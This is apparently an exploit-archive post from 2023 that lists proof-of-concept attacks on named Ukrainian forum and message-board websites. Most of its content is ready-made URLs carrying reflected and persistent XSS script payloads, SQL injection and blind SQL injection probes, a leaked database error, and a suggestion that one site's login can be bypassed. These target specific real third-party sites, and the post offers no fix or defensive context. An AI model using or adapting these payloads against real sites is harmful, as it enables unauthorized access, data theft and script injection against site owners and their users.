\\                //
                     \\              //
                      \\            //
                       \\          //
                        \\    __  //
                         \\ [|  |//
 __                      _\\E|_ //
|  |                    |__\\__//___m____
|  \_______________,---''   \'/'  _______\_
>[====>               ( :   (O)  [   |   ] B
|: /~~~~~~~~~~~~~~~`---..__,/,\   ~~~~~~~/~
|__|                    |_//__\\|~~~w~~~~
                         // E| \\B ukraine
                        //  [|__\\
                       //        \\
                      //          \\
                     //            \\
                    //              \\
                   //                \\

#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => ???
#CMS => ukraina boards and forums
#Vulnz => XSS/Blind SQLi/SQLi
#Date => 28/03/2023

*PoC*
[code]
--------------------------------------------------------------------------------
http://photo.klimenko.kiev.ua/forum.php?c=search&search='-------'&submit=SEARCH |: <= $_POST SQLi  #1
--------------------------------------------------------------------------------
https://www.stihi.in.ua/forum.php?cat=5'>\>"><script>alert(1);</script>&page=2  |:  <= XSS         #2
----------------------------------------------------------------------------------------------------------------------------------
https://astrology.org.ua/thread.php?lang=en>\>"></a><script>alert("XSS by BM-");</script>&appSize=0&page=1&v=20230324&thread=2198 |: <= XSS  #3
----------------------------------------------------------------------------------------------------------------------------------

_______________________________________________
#DB type:*[Oracle]*                            |  #4
                                               |
Unknown column 'ob_ot\'' in 'order clause'     |
_______________________________________________|__________________
http://board.veles.in.ua/board.php?act=cat&cat_id=1059&sort=-ob_ot|: <= Blind SQLi 
------------------------------------------------------------------

___________________________
#DB version:*[MySQL >=5]*  |______________________
http://www.moto.kiev.ua/forum/gallery.php?id=lazer|: <= Blind SQLi   #5
--------------------------------------------------
_______________________________________
https://www.hata.dp.ua/board.php?cat=1 |: <= SQLi___________________________________________#6
https://www.hata.dp.ua/board.php#board_form <= login MySQL result error , can be bypassed??? |
---------------------------------------------------------------------------------------------



______________________________________
http://www.u-technik.com.ua/board.php |: <= Persistent XSS on page form ( probable buffer overflow) #7
-------------------------------------------------------------------
'>">\><script>alert(1);</script> |'>">\><script>alert(1);</script> |
------------------------------------------------------------------ |
'>">\><script>alert(1);</script>                                   |
                                                                   |
                                                                   |
                                                                   |
-------------------------------------------------------------------
[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*